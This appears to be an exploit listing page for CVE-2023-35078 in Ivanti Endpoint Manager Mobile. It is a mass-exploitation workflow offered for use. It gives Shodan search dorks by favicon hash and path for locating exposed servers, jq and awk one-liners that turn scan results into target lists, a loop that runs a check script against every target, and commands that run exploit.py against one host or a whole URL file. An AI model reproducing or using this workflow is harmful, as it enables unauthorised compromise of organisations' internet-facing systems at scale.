Share
## https://sploitus.com/exploit?id=58E73F72-BD92-5346-AB3A-90B799CEE4F8
# CVE-2023-35078
Ivanti Endpoint Manager Mobile exploit <br/>

- Shodan dorks: <br/>
	  http.favicon.hash:362091310 <br/>
	  http.favicon.hash:545827989 <br/>
	  path=/mifs <br/>

- Transform json to data <br/>

      jq -cr 'select(.http.favicon.hash == 545827989) | [ if .ssl? then "https://" else "http://" end , (.ip_str) + ":" + (.port|tostring)] | add' shodan.json > data_file
      jq -cr 'select(.http.favicon.hash == 362091310) | [ if .ssl? then "https://" else "http://" end , (.ip_str) + ":" + (.port|tostring)] | add' shodan.json > data_file
      python shodan-parser.py -o temp_data_file shodan.json
      awk '{print "https://"$0}' temp_data_file > data_file
- How run check. <br/>

      while read line; do ./check.sh $line; done < data_file

- Setup requirements <br/>

      pip install -r requirements.txt

- Run exploit single address . <br/>

      python exploit.py -u http://
- Run mass exploit . <br/>

      python exploit.py -f urls.txt